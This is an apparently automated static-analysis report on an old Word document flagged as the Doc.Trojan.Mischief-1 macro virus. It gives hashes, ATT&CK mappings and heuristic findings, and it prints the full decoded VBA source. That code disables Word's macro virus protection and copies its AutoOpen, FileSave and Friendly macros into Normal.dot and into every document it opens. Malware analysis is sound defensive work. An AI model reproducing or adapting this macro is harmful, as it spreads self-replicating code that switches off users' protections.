Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 591ee0892c5577a3…

MALICIOUS

Office (OLE)

30.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 806eba934d1f9535d21cb31c8e5a179b SHA-1: 1428fd65c94d5977883459fb6dc780f8af80239e SHA-256: 591ee0892c5577a36a95a21fa89ace4ececddf1be8bb48ca12961ec20bf52a8a
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for macro-based malware. The script attempts to copy itself to the global Normal.dot template and the current document, indicating a self-propagation and infection mechanism. The ClamAV detection 'Doc.Trojan.Mischief-1' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Mischief-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Mischief-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1734 bytes
SHA-256: ca45d442346329b71377cc3294977a9c065ef7a4862bb6c69181292a692efc72
Detection
ClamAV: Doc.Trojan.Mischief-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FileSave"

Attribute VB_Name = "AutoOpen"

Option Explicit

Sub MAIN()
    On Error GoTo -1: On Error GoTo NoAutoOpen
    Dim i
    ' Do mischief!
    If Day(Now()) = 13 Then
        MsgBox "Hello, This is your friendly Word macro virus!", vbInformation
    End If
    '   Now copy the virus
    i = WordBasic.call("Friendly.Friendly", WordBasic.[FileName$]())
    
NoAutoOpen:
End Sub


Attribute VB_Name = "Friendly"

Option Explicit

Sub MAIN()
End Sub

Public Function Friendly(fileName_$)
On Error GoTo NoMacroCopy
Dim j

    ' Try to disable NORMAL.DOT write access warnings
    WordBasic.ToolsOptionsSave GlobalDotPrompt:=0
    
    ' Disable macro virus protection
    Options.VirusProtection = False
    
    ' Check if already infected
    j = WordBasic.CountMacros(0)
    If j <= 1 Then
        ' Copy to global
        WordBasic.MacroCopy fileName_$ + ":FileSave", "Global:FileSave", 1
        WordBasic.MacroCopy fileName_$ + ":AutoOpen", "Global:AutoOpen", 1
        WordBasic.MacroCopy fileName_$ + ":Friendly", "Global:Friendly", 1
    End If
    
    j = WordBasic.CountMacros(1)
    If j <= 1 Then
        ' Infect active file
        WordBasic.MacroCopy "Global:FileSave", fileName_$ + ":FileSave", 1
        WordBasic.MacroCopy "Global:AutoOpen", fileName_$ + ":AutoOpen", 1
        WordBasic.MacroCopy "Global:Friendly", fileName_$ + ":Friendly", 1
    End If
NoMacroCopy:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.